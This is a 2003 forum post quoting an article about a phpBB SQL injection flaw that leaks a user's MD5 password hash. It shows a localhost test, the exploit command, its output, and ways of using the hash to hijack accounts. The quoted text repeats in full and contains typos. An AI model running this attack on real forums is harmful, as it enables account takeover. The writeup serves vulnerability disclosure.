Sign In
Register
Help
Taken From RootSecure.net
Quote
A recent post to the BugTraq mailing list reveled yet another vulnerability found in phpBB a high powered, fully scalable, and highly customisable open-source bulletin board package.
The post contains ingenious proof of concept code, to circumvent phpBBs inbuilt security measures, specifically the fact that with this vulnerability, only integers can be passed back to the client. In this case the MD5 password hash of a specific user is passed back one character at a time.
The attack was found to be successful when carried out against a test machine setup running mysql Ver 12.20 Distrib 4.0.13 however only when PHP was configured with the register_globals variable set to on - a common configuration on most web servers, which will hopefully be eradiated with the increased implementation of PHP 4 (defaults to setting register_globlals = off).
For the test scenario a user was registered on the phpBB board with username test, and password test123. The MD5 hash of test123 (cc03e747a6afbbcbf8be7668acfebee5) was gained by executing the following Perl code:
use Digest::MD5 qw(md5_hex);
$digest = md5_hex("test123");
print "$digest\n";
Next the provided exploit code was run using the following command:
perl phpsqlexploit.pl localhost http://localhost/phpBB2/viewtopic.php 3
which issued the response :
Trying to get password hash for uid 3 server localhost dbtype: mysql4
MD5 Hash for uid 3 is cc03e747a6afbbcbf8be7668acfebee5
Note: The MD5 hash gained from the exploit can be see to match that of the known hash for the password test123.
Once gained by the attacker, the MD5 password hash can be used in two main ways. An attempt can be made to brute force it (a 7 character password on a reasonable spec machine would take a couple of hours) or it can be inserted into a custom made HTTP get request - both methods lead to successful compromise of a phpBB user account.
Actual log entries gained from a successful attack, along with the raw HTML traffic sent back by the client, are available for download from: content/temp/phpbb_sql_int_inqection.txt
The post contains ingenious proof of concept code, to circumvent phpBBs inbuilt security measures, specifically the fact that with this vulnerability, only integers can be passed back to the client. In this case the MD5 password hash of a specific user is passed back one character at a time.
The attack was found to be successful when carried out against a test machine setup running mysql Ver 12.20 Distrib 4.0.13 however only when PHP was configured with the register_globals variable set to on - a common configuration on most web servers, which will hopefully be eradiated with the increased implementation of PHP 4 (defaults to setting register_globlals = off).
For the test scenario a user was registered on the phpBB board with username test, and password test123. The MD5 hash of test123 (cc03e747a6afbbcbf8be7668acfebee5) was gained by executing the following Perl code:
use Digest::MD5 qw(md5_hex);
$digest = md5_hex("test123");
print "$digest\n";
Next the provided exploit code was run using the following command:
perl phpsqlexploit.pl localhost http://localhost/phpBB2/viewtopic.php 3
which issued the response :
Trying to get password hash for uid 3 server localhost dbtype: mysql4
MD5 Hash for uid 3 is cc03e747a6afbbcbf8be7668acfebee5
Note: The MD5 hash gained from the exploit can be see to match that of the known hash for the password test123.
Once gained by the attacker, the MD5 password hash can be used in two main ways. An attempt can be made to brute force it (a 7 character password on a reasonable spec machine would take a couple of hours) or it can be inserted into a custom made HTTP get request - both methods lead to successful compromise of a phpBB user account.
Actual log entries gained from a successful attack, along with the raw HTML traffic sent back by the client, are available for download from: content/temp/phpbb_sql_int_inqection.txt
Attached File(s)
-
phpbb_sql.pl (3.97K)
Number of downloads: 442
MultiQuote
Posted 16 October 2003 - 02:03 PM
